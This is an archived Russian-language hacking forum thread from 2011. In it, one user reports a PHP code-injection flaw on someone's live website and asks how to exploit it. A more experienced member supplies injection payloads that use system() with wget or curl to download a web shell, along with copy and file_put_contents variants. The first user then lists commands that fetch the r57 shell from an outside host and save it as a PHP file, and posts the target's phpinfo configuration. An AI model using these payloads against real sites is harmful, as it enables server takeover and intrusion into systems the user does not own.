HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #18711  
Старый 01.12.2011, 02:39
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от Kasper1898  
Kasper1898 said:
нашел php injection запрос вот такой
http://сайт/imp_sub.html?_c=${@print(md5(kasper))}&_m=publicat ions&_t=rec&id=1403
в ответ получаю
67cb7dbdb935430911459f5431d61701Method {${@print(md5(kasper))}} in class [$this->rec] does not exists!
Кто подскажет каким методом раскрутить?
да что там раскручивать, лей шелл одним запросом, copy, file_put_contents, если системные фунцкии не отключены, то system + wget или system + curl, вобщем фантазируй.

а в след раз открой учебник по php, прежде чем задавать элементарные вопросы
 
Ответить с цитированием

  #18712  
Старый 01.12.2011, 02:42
Kasper1898
Guest
Сообщений: n/a
Провел на форуме:
4716

Репутация: 0
По умолчанию

Цитата:
Сообщение от Konqi  
Konqi said:
да что там раскручивать, лей шелл одним запросом, copy, file_put_contents, если системные фунцкии не отключены, то system + wget или system + curl, вобщем фантазируй.
а в след раз открой учебник по php, прежде чем задавать элементарные вопросы
я попробывал 3 варианта

wget http://www.shellhost.com/r57.txt -O 2.php

curl http://www.shellhost.com/r57.txt > 2.php

fetch http://www.shellhost.com/r57.txt; mv r57.txt 2.php

но не один из них не подошел

можешь помочь ?
 
Ответить с цитированием

  #18713  
Старый 01.12.2011, 02:50
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от Kasper1898  
Kasper1898 said:
у меня с php совсем плохо
можешь помочь довести начатое?а то я запрос криво составлю
буду ооооооочень благодарен,капец как хочу залить шелл
${copy('откуда','куда')}

${file_put_contents('куда вставить','что вставить')}

${system('wget http://шелл')} //закачает шелл в pwd

${system('curl http://шелл > /куда/записать/шелл')}

мануалы по фунцкиям найдешь на php.su
 
Ответить с цитированием

  #18714  
Старый 01.12.2011, 03:22
Kasper1898
Guest
Сообщений: n/a
Провел на форуме:
4716

Репутация: 0
По умолчанию

Цитата:
Сообщение от Konqi  
Konqi said:
${copy('откуда','куда')}
${file_put_contents('куда вставить','что вставить')}
${system('wget http://шелл')} //закачает шелл в pwd
${system('curl http://шелл > /куда/записать/шелл')}
мануалы по фунцкиям найдешь на php.su
перепробывал все,всеровно не получается

есть еще info.php

Configuration

PHP Core

Directive Local Value Master Value

allow_call_time_pass_reference On On

allow_url_fopen On On

always_populate_raw_post_data Off Off

arg_separator.input & &

arg_separator.output & &

asp_tags Off Off

auto_append_file no value no value

auto_prepend_file no value no value

browscap no value no value

default_charset no value no value

default_mimetype text/html text/html

define_syslog_variables Off Off

disable_classes no value no value

disable_functions no value no value

display_errors On On

display_startup_errors On On

doc_root no value no value

docref_ext no value no value

docref_root no value no value

enable_dl On On

error_append_string no value no value

error_log no value no value

error_prepend_string no value no value

error_reporting 2039 2039

expose_php On On

extension_dir /usr/local/lib/php/extensions/no-debug-non-zts-20020429 /usr/local/lib/php/extensions/no-debug-non-zts-20020429

file_uploads On On

gpc_order GPC GPC

highlight.bg #FFFFFF #FFFFFF

highlight.comment #FF8000 #FF8000

highlight.default #0000BB #0000BB

highlight.html #000000 #000000

highlight.keyword #007700 #007700

highlight.string #DD0000 #DD0000

html_errors On On

ignore_repeated_errors Off Off

ignore_repeated_source Off Off

ignore_user_abort Off Off

implicit_flush Off Off

include_path .:/usr/local/lib/php .:/usr/local/lib/php

log_errors On On

log_errors_max_len 1024 1024

magic_quotes_gpc Off Off

magic_quotes_runtime Off Off

magic_quotes_sybase Off Off

max_execution_time 30 30

max_input_time 60 60

open_basedir no value no value

output_buffering 4096 4096

output_handler no value no value

post_max_size 30M 30M

precision 14 14

register_argc_argv Off Off

register_globals On On

report_memleaks On On

safe_mode Off Off

safe_mode_exec_dir no value no value

safe_mode_gid Off Off

safe_mode_include_dir no value no value

sendmail_from me@localhost.com me@localhost.com

sendmail_path /usr/sbin/sendmail -t -i /usr/sbin/sendmail -t -i

serialize_precision 100 100

short_open_tag On On

SMTP localhost localhost

smtp_port 25 25

sql.safe_mode Off Off

track_errors Off Off

unserialize_callback_func no value no value

upload_max_filesize 20M 20M

upload_tmp_dir no value no value

user_dir no value no value

variables_order GPCS GPCS

xmlrpc_error_number 0 0

xmlrpc_errors Off Off

y2k_compliance On On
 
Ответить с цитированием

  #18715  
Старый 01.12.2011, 03:33
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Kasper1898

из за ваших кривых рук мы не будем флудить тут до утра, почитайте учебники, никто не должен за вас что то сделать, здесь дают лишь советы.
 
Ответить с цитированием

  #18716  
Старый 01.12.2011, 04:29
Wave
Guest
Сообщений: n/a
Провел на форуме:
34031

Репутация: 0
По умолчанию

реально ли взломать или убить сайт funfree.ru ?

не считая Дос и Ддос атаки
 
Ответить с цитированием

  #18717  
Старый 01.12.2011, 04:32
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от Wave  
Wave said:
реально ли взломать или убить сайт funfree.ru ?
не считая Дос и Ддос атаки
это не форум киллеров, тут не убивают

а для взлома вам сюда /forum57.html
 
Ответить с цитированием

  #18718  
Старый 01.12.2011, 04:36
d1v
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401

Репутация: 0
По умолчанию

Цитата:
Сообщение от Wave  
Wave said:
реально ли взломать или убить сайт funfree.ru ?
не считая Дос и Ддос атаки
реально.

Цитата:
Сообщение от None  
Опасный сайт
Посещение этой страницы может представлять опасность. Страница была замечена в распространении вредоносного программного обеспечения.
Opera Software настоятельно не рекомендует посещать эту страницу.
 
Ответить с цитированием

  #18719  
Старый 01.12.2011, 04:39
Wave
Guest
Сообщений: n/a
Провел на форуме:
34031

Репутация: 0
По умолчанию

Цитата:
Сообщение от None  
это не форум киллеров, тут не убивают
а для взлома вам сюда /forum57.html
Тогда я пишу правильно )

Это мой сайт... так что вреда ему я никак не желаю

а вот узнать сможет ли мне кто либо навредить - хотелось бы знать
 
Ответить с цитированием

  #18720  
Старый 01.12.2011, 04:41
Wave
Guest
Сообщений: n/a
Провел на форуме:
34031

Репутация: 0
По умолчанию

Цитата:
Сообщение от None  
Опасный сайт
Посещение этой страницы может представлять опасность. Страница была замечена в распространении вредоносного программного обеспечения.
Opera Software настоятельно не рекомендует посещать эту страницу.
Это так на него опера ругается ?

из-за чего... там ничего плохого нету
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ